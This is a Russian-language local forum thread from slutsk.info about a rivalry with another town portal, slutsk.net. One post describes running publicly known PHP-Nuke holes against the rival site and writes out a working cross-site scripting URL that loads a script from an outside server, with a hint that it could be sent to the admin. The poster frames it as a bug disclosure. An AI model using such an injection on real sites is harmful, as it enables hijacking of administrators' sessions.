slutsk.info

Список разделов Общие разделы Слуцкий креатив

Описание: Made in Slutsk. Обсуждаем программы, флеш, музыку, видео и сайты слуцких авторов.

Сообщение #26 VEG » 09.03.2006, 11:21

Typhoon:Спешал фор Nere1d А что ты хотел там особенное увидеть! от ресурса который работает один день или на форуме Veg'a когда он его открыл сразу туча народа была в очередь устраивались чтоб попасть
По крайней мере бета тестирование было закрытым, и когда ресурс открылся, здесь уже было порядка 50 тем и каждый день я с Новиковым Виталием добавлял 3-4 новые. А ваш сайт был пропиарен заранее аж с мая 2005 года. Это всего-то 3 дня прошло?
А теперь флейм slutsk.net vs. slutsk.info просьба прикрыть. Все что я хотел бы сказать - сказано на предыдущих страницах этой ветки. Кто захочет - тот поймет.
Последний раз редактировалось VEG 09.03.2006, 11:35, всего редактировалось 2 раз(а).
С наилучшими пожеланиями, Евгений
VEG M
Администратор
Администратор
Аватара
Возраст: 36
Откуда: Финляндия
Зарегистрирован: 24.07.2004

Сообщение #27 Typhoon » 09.03.2006, 11:26

Прошу у Veg'a прощения но еще одна мессага для Werdis'a посмотри будет очень интересно не правда ли серьезный баг с системе безопасности "Курьера" ХАКККК #2


И уважаемый Veg прошу заметить мы не разу не высказались плохо о твоем ресурсе и то что ты делаешь! поэтому эту бесмысленную болтавню типа инфо против нет я тоже счетаю бесмысленной!
Typhoon
100+ сообщений
Возраст: 46
Откуда: Слуцк
Зарегистрирован: 08.07.2005

Сообщение #28 Anonymous » 09.03.2006, 12:43

я тут новенький а что у вас есть интересное почитать а то этот slutsk.info отстой натуральный ничего гету и зачем его нада было открывать!
Anonymous
Гость

Сообщение #29 Nere1D » 09.03.2006, 17:47

А по-моему это просто зависть.......
Бо я табе з-пад шыбеніцы кажу, Народзе, што тагды толькі зажывеш шчасліва, калі над табою Маскаля ўжэ не будзе. Кастусь Каліноўскі
Nere1D
4000+ сообщений
Аватара
Возраст: 35
Откуда: Слуцк
Зарегистрирован: 06.08.2004

Сообщение #30 Werdis » 09.03.2006, 21:27

Детство, детство...
Typhoon, неужели ты думаешь, что мне охота тратить своё время и траффик на взлом (или как ты выразился "тестирование") слуцк.инфо?
Просто пост Паравозова о 7 челах меня заинтересовал...
Я взял 4 публично известные дырки php-nuke... И прогнал их через сайт...
Одна пролетела незаметно...
Две другие выдавали злобное сообщение о том, что мой IP вычислен, и что я забанен, заблокирован, короче расстрелян... :) Только вот после этого бана, я без смены IP свободно ходил-туда сюда по "порталу"...
И одна дырка все же сработала...
Она позволяет прицеплять любой JavaScript к странице...
http://slutsk.info/?pagetitle=title</title></head><script+src=http://имя_другого_сервера/script.js?
Дальше её можно подсунуть админу... Ведь и ты и Паравозов кликали на мой "Хак #1"... Дальше думаю ты понимаешь... Ведь вы, люди знающие, форум ломаете... :)
Но я человек не вредный (местами), поэтому просто указал вам на баг...
Причем, повторюсь, публично опубликованный...
http://www.securitylab.ru/vulnerability/source/262500.php
В споре рождается истина. © Сократ
Тогда зачем тратить время??? Werdis © 2010
Werdis M
1000+ сообщений
Аватара
Возраст: 40
Откуда: Слуцк
Зарегистрирован: 18.01.2005

Сообщение #31 Typhoon » 09.03.2006, 22:52

Спасибо Werdis'y за маленький лекбез без него ну никак я вроде написал выше что защиты не планировалось еще ни какой, ибо меня больше интересует как будут вести модули в системе и где еще мона наткнуться на неприятности ибо часть модулей изменялось а про эти дырки никто и не думал так как их не прочитали только что ленивые.

А что касательно лома форума дык нам тоже это не нада мы сами по себе вы сами посебе хотя и на форуме есть дырки и прочии огрехи. Одну такую сегодня Veg видел! Поэтому как говорится каждому своя песочница. А самое главное мы тоже белые и пушистые!

Да и самое главное приношу Veg'у публичные извинения за сегодняшние издевки над форумом в плане аватаров!
Typhoon
100+ сообщений
Возраст: 46
Откуда: Слуцк
Зарегистрирован: 08.07.2005

Сообщение #32 Nomak » 08.03.2012, 21:10

Жаль, не видел я творения сего в действии. Наверно многое мог бы перенять. Особенно если учесть, что над сайтом работало 7 человек. Теперь понятно почему создание "нового сайта Слуцка" воспринимается с таким скептицизмом=) Эх, жаль мы не можем найти себе столько помощников...
а
PS Как я понял проект загнулся просто из-за того, что он никому не был нужен, в том числе и разрабам? Расскажите историю создания и развала.
Nomak
250+ сообщений
Аватара
Зарегистрирован: 18.02.2006

Сообщение #33 Вася Паравозов » 12.06.2012, 03:16

Проект на то он и проект, чтобы выйти на окупаемость или закрыться в итоге.
Знаете, в наше время никто не хотел и не понимал зачем платить 12 долларов за "джинсу" на сайте :)
Я игнорирую троллей.
Hala Madrid! Vamos España!
Именно мы научили весь мир экономить, закапывая в столовой котлету в две каши. Мы называем себя РТИ, а БНТУ завистливо смотрит на нас через дорогу.
Вася Паравозов M
Автор темы
3000+ сообщений
Аватара
Возраст: 36
Откуда: Слуцк
Зарегистрирован: 27.11.2004

Сообщение #34 Nieśviadomy Biełarus » 12.06.2012, 20:36

Почитал ветку с начала - поднял себе настроение :lol:
Nas mała, nie čakajcie litaści! (c)
Nieśviadomy Biełarus M
5000+ сообщений
Аватара
Откуда: Słucak
Зарегистрирован: 16.04.2006

Пред.

Вернуться в Слуцкий креатив



cron